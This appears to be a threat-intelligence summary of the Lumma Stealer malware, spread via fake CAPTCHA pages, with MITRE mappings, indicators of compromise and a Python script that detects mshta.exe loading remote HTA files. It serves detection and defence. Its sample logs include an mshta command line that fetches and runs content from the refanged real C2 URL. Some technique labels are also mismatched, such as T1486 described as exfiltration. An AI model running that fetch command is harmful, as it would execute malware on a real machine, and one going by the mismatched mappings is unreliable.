This article discusses the Lumma Stealer malware, which spreads through fake CAPTCHA pages and targets cryptocurrency wallets and two-factor authentication browser extensions. It has been offered as Malware-as-a-Service since August 2022, so anyone willing to pay a subscription gets access to a command and control (C2) panel for monitoring infected computers. Affected: Lumma Stealer, CAPTCHA
Key points:
- Lumma Stealer malware spreads through fake CAPTCHA.
- Targets cryptocurrency wallets and 2FA browser extensions.
- Available as a Malware-as-a-Service since August 2022.
- Allows access to a command and control (C2) panel for monitoring.
- Uses deceptive methods to trick users into executing malware.
- Executes remotely hosted malicious scripts via mshta.exe.
- Collects sensitive information such as login credentials and cryptocurrency keys.
- Relies on phishing via fake websites and malicious links.
- Recommends using antivirus and avoiding suspicious links or downloads.
MITRE Techniques:
- Execution (T1203): Uses mshta.exe to execute malicious HTML applications hosted on remote servers.
- Credential Dumping (T1003): Collects stored credentials from browsers and other applications.
- Data Encrypted for Impact (T1486): Exfiltrates sensitive data such as cryptocurrency wallet files and personal keys.
- Phishing (T1566): Utilizes fake websites to trick users into executing malicious scripts.
- Command and Control (T1071): Establishes communication with remote servers to receive commands and exfiltrate data.
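The mshta.exe behaviour described above (a signed Windows binary pulling an HTML application from a remote server) is something a defender can hunt for in process-creation telemetry. The script below is an added example, not code from the article or from the researcher; it parses constructed Sysmon Event ID 1 style records flattened to key=value pairs, flags any mshta.exe launch whose command line carries a remote URL, and additionally matches the host:port of the article's defanged IoC URL after refanging it. The log format, the rule names and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import urlparse

# Defanged URL indicator quoted from the article's IoC list.
IOC_URL_DEFANGED = "hxxp://5[.]253[.]59[.]210:7777/confirma1[.]com/Captcha"


def refang(ioc):
    """Turn a defanged indicator back into the form that appears in real logs."""
    return (ioc.replace("hxxps://", "https://")
               .replace("hxxp://", "http://")
               .replace("[.]", "."))


# key=value pairs, value either double-quoted (may contain spaces) or bare.
_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
_URL = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)


def parse_event(line):
    """Parse one flattened process-creation record into a dict (assumed format)."""
    return {key: (quoted or bare) for key, quoted, bare in _KV.findall(line)}


def analyze(event):
    """Return a list of rule names that fire for one parsed event."""
    findings = []
    image = event.get("Image", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image != "mshta.exe":
        return findings
    urls = _URL.findall(event.get("CommandLine", ""))
    if not urls:
        return findings  # local .hta files are not what the article describes
    # mshta.exe fetching an HTA from a remote server (the article's execution step)
    findings.append("mshta_remote_hta")
    ioc_netloc = urlparse(refang(IOC_URL_DEFANGED)).netloc.lower()
    if any(urlparse(u).netloc.lower() == ioc_netloc for u in urls):
        findings.append("known_lumma_c2_url")  # exact host:port match with the IoC
    return findings


def scan(lines):
    """Map line index -> findings for every record that triggers at least one rule."""
    results = {}
    for index, line in enumerate(lines):
        findings = analyze(parse_event(line))
        if findings:
            results[index] = findings
    return results


# Constructed sample records; the first one embeds the refanged article IoC.
SAMPLE_LOGS = [
    f'Image=C:\\Windows\\System32\\mshta.exe CommandLine="mshta.exe {refang(IOC_URL_DEFANGED)}" '
    'ParentImage=C:\\Windows\\explorer.exe',
    # remote HTA from an unrelated (constructed) host: still suspicious
    'Image=C:\\Windows\\System32\\mshta.exe CommandLine="mshta https://example.invalid/update.hta" '
    'ParentImage=C:\\Windows\\explorer.exe',
    # benign local HTA launched from a shell: no remote URL, should not fire
    'Image=C:\\Windows\\System32\\mshta.exe CommandLine="mshta.exe C:\\Tools\\inventory.hta" '
    'ParentImage=C:\\Windows\\System32\\cmd.exe',
    # a browser with a URL on its command line: wrong image, should not fire
    'Image="C:\\Program Files\\Browser\\browser.exe" CommandLine="browser.exe https://example.invalid/" '
    'ParentImage=C:\\Windows\\explorer.exe',
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_LOGS).items():
        print(f"record {index}: {', '.join(findings)}")
```

The generic `mshta_remote_hta` rule is the one worth deploying: the IoC host will rotate, but mshta.exe loading content over HTTP(S) is rare in normal operation and is the step the fake CAPTCHA page depends on.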
Indicators of Compromise:
- [url] hxxp://5[.]253[.]59[.]210:7777/confirma1[.]com/Captcha
- [file name] Captcha
- [file hash] MD5: 55cc925d87797284145dbc82486769d0
- [file hash] SHA-1: fa843b0c5b3409e1f77ee10a2ec573d1fbd3d2e5
- [file hash] SHA-256: d41a963135b51adcdd95f5f00a92cebe99b3506a58a9e3947028a73f8f915690
- See the full article for the complete list of IoCs.
Full Research: https://wezard4u.tistory.com/429377